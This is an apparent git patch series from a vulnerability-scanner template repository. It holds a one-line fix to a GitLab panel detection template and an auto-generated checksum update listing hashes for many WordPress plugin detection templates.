Subject: [PATCH 0481/1090] Update gitlab-detect.yaml (#8240)

* Update gitlab-detect.yaml

Fix false positive

* Update gitlab-detect.yaml

---------

Co-authored-by: Dhiyaneshwaran 
---
 http/exposed-panels/gitlab-detect.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/http/exposed-panels/gitlab-detect.yaml b/http/exposed-panels/gitlab-detect.yaml
index 4fa1fb9165..a9f42d67bd 100644
--- a/http/exposed-panels/gitlab-detect.yaml
+++ b/http/exposed-panels/gitlab-detect.yaml
@@ -27,6 +27,7 @@ http:
         words:
           - 'GitLab'
           - 'https://about.gitlab.com'
+        condition: and
 
       - type: status
         status:

From 992bc5c7720d6b79f5fdc083c0a5c5e63af492de Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 22 Sep 2023 10:36:57 +0000
Subject: [PATCH 0483/1090] Auto Generated Templates Checksum [Fri Sep 22
 10:36:57 UTC 2023] :robot:

---
 templates-checksum.txt | 422 ++++++++++++++++++++---------------------
 1 file changed, 211 insertions(+), 211 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index cfdc258cf3..f134fe7e25 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -360,7 +360,7 @@ helpers/wordlists/wordpress-plugins.txt:916cc826b793c7afad2208b2fd46ea2cb752dec5
 helpers/wordlists/wordpress-themes.txt:3424134fa69db08604545ecf1441cf6330bf0982
 helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56
 helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b
-helpers/wordpress/plugins/ad-inserter.txt:38bc2a6cfb847a70c262d12fd660360636325415
+helpers/wordpress/plugins/ad-inserter.txt:048ceafceae47b034560600476a295b608c60cf4
 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/admin-menu-editor.txt:4572917cbde34e4ba98ab9a65059efd81be6594b
 helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7df
@@ -371,7 +371,7 @@ helpers/wordpress/plugins/all-in-one-seo-pack.txt:344b5cffb3c634589e6cd6bc3a7f10
 helpers/wordpress/plugins/all-in-one-wp-migration.txt:addf63c8a9f97e52b5b7aca6dc435f3680b17d2a
 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59f
 helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57
-helpers/wordpress/plugins/antispam-bee.txt:3b6c0ae2aec55040eb96fc7234870be51b6064b6
+helpers/wordpress/plugins/antispam-bee.txt:bd5240b767bb950186835acb8bf1d4cb794a5706
 helpers/wordpress/plugins/astra-sites.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5
 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711
 helpers/wordpress/plugins/autoptimize.txt:661ae89c9a4b16c450c2a094d410c4ee74719cb3
@@ -451,7 +451,7 @@ helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfef
 helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa8604e7ecde642f7080e6
 helpers/wordpress/plugins/iwp-client.txt:9f028fa080dca632a19e807c2a3570f67ae71de3
 helpers/wordpress/plugins/jetpack-boost.txt:d24fa45ca77f079cc359c97272276969e6aead2c
-helpers/wordpress/plugins/jetpack.txt:c884ca39f6534b8c9b0ca76bd78fff7116865fc1
+helpers/wordpress/plugins/jetpack.txt:f4f2a6e60645ec077647c75c65fc7817ac02b757
 helpers/wordpress/plugins/kadence-blocks.txt:257c663cd420229c3490aaabb942051c0ff75650
 helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa
 helpers/wordpress/plugins/leadin.txt:78702f4ab9863ce2deba27117b027181e59b6e3d
@@ -474,7 +474,7 @@ helpers/wordpress/plugins/ml-slider.txt:f6b24d20fb8ca8547810ce73f202e02919d356e0
 helpers/wordpress/plugins/newsletter.txt:8179f6751c646b7c3f539243147306a43ca806f3
 helpers/wordpress/plugins/nextend-facebook-connect.txt:4be1dfbb67ef8087f7232dac0ed90c2603a22047
 helpers/wordpress/plugins/nextgen-gallery.txt:7ca6257a3f05a3a6b604fd5dae8af8c1b41b8e0f
-helpers/wordpress/plugins/ninja-forms.txt:8cef662de77623514d4c94b20aeef22a56a8f137
+helpers/wordpress/plugins/ninja-forms.txt:802d91a07f27206424765f38e0bb5c75968ae33a
 helpers/wordpress/plugins/ocean-extra.txt:595d550379b2cb8bccb9659627308ff4e751d23f
 helpers/wordpress/plugins/official-facebook-pixel.txt:ae0028333ce6fece2c0f57bd104815e938d80643
 helpers/wordpress/plugins/one-click-demo-import.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8
@@ -491,7 +491,7 @@ helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6
 helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe
 helpers/wordpress/plugins/post-smtp.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7
 helpers/wordpress/plugins/post-types-order.txt:31f566259c1a3f810256e3679e10faa457bb4a0b
-helpers/wordpress/plugins/premium-addons-for-elementor.txt:9c6ca999d3234cd57bafd8ca5b256f4b8fbe2d44
+helpers/wordpress/plugins/premium-addons-for-elementor.txt:befa0edb7ef642be5e7dfc7cc7c69bc31127207e
 helpers/wordpress/plugins/pretty-link.txt:eedf6a14348e4bc362e215e4dcd1e066e0bd16f7
 helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/really-simple-ssl.txt:b638f84cceb02801b7ef7b94df984fd22b23f59e
@@ -499,7 +499,7 @@ helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af
 helpers/wordpress/plugins/redux-framework.txt:0f2d74125dea18acce67c02619dcfea86c380227
 helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4
 helpers/wordpress/plugins/safe-svg.txt:595d550379b2cb8bccb9659627308ff4e751d23f
-helpers/wordpress/plugins/seo-by-rank-math.txt:a43557d2fb8277db824695f3e651c31ef604fac4
+helpers/wordpress/plugins/seo-by-rank-math.txt:ee6a6cf943f9c499c0224b71af2aaa48cb166774
 helpers/wordpress/plugins/sg-cachepress.txt:9c381dd6bbe0788e8717d7adc6b2f8b8d3687aaa
 helpers/wordpress/plugins/sg-security.txt:6546e0bd1a292663f6166d3d6d903530b6db35c4
 helpers/wordpress/plugins/shortcodes-ultimate.txt:c53ed3ab1a6689cbfb71149816b427f4cf870dc3
@@ -537,7 +537,7 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:381bb12da04a82580bb6
 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3
 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:7035802a8f118b141c54f97b9e8bf36b7d7f53a2
-helpers/wordpress/plugins/woocommerce-payments.txt:f6f8ec8cee0642425740179c78f2bf7d0a6572f1
+helpers/wordpress/plugins/woocommerce-payments.txt:60e6b29cae222d0ccf5641a7ebe9d778961c2629
 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0
 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:634ac7a7e33e6dc123884fef23157c442970fb87
 helpers/wordpress/plugins/woocommerce-services.txt:440a9edb1796d0cd5f2d71aea1a74af81b05abbd
@@ -557,9 +557,9 @@ helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4de
 helpers/wordpress/plugins/wp-optimize.txt:8fb53f1274568d9b7cfb82cfa955cf918a9b148a
 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f
 helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a
-helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:d343c69967f4ab0a58418b4f52fe9d4c4e39841f
+helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:78aef53da0b8d7a80656c80aa35ad6d410b7f068
 helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad
-helpers/wordpress/plugins/wp-seopress.txt:0a7512d9a82ef5e8aacbfc48d29f1ac553e28c08
+helpers/wordpress/plugins/wp-seopress.txt:5e56ceb6a3ee0eeaba07ec39a491a470a34c31f7
 helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5
 helpers/wordpress/plugins/wp-smushit.txt:5e74b23ed477d2de0db916790751da05ed4cee9c
 helpers/wordpress/plugins/wp-statistics.txt:d5b438b33eefd2351317d48768c3cfdcc2e1fbc7
@@ -3124,7 +3124,7 @@ http/exposed-panels/git-repository-browser.yaml:f29b1d24e12260f4f5b8dab4bceaf44b
 http/exposed-panels/gitblit-panel.yaml:a0fc79c9c3073d33243b3253c5f32b2df638791d
 http/exposed-panels/gitea-login.yaml:336158413b73ea8f3f9e8a39779194e80322578e
 http/exposed-panels/github-enterprise-detect.yaml:30fe3b733e837597a128949bf03d94e415c73575
-http/exposed-panels/gitlab-detect.yaml:ef9a397373a76a800bdbf77a474613282ffc7a77
+http/exposed-panels/gitlab-detect.yaml:a86d48073c46c87674cbf3e7400b3d4f62b2e6d6
 http/exposed-panels/globalprotect-panel.yaml:19719c4560cd2442bcc4b6478dbf850b19cd064a
 http/exposed-panels/glowroot-panel.yaml:ef30e9d018ad881d623f5ca31d56098a2a364bd6
 http/exposed-panels/glpi-panel.yaml:51b5e6579228863e3a5d73b79c25b55fef7fda7d
@@ -5852,218 +5852,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
-http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
+http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
+http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
-http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
-http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
-http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
-http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
-http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
-http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
-http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
-http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
-http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
-http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
-http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
-http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
-http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
+http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
+http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
+http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
+http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
+http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
+http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
+http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
+http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
+http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
+http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
+http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
+http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
+http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
-http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
-http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
-http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
-http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
-http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
-http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
-http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
-http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
-http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
-http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
-http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
-http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
+http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
+http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
+http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
+http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
+http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
+http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
+http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
+http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
+http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
+http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
+http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
+http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
+http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
-http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
-http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
-http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
-http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
-http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
-http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
-http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
-http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
-http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
-http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
-http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
-http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
+http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
+http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
+http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
+http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
+http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
+http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
+http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
+http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
+http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
+http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
+http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
+http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
-http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
-http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
-http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
-http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
-http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
-http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
-http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
-http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
-http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
-http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
-http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
-http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
-http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
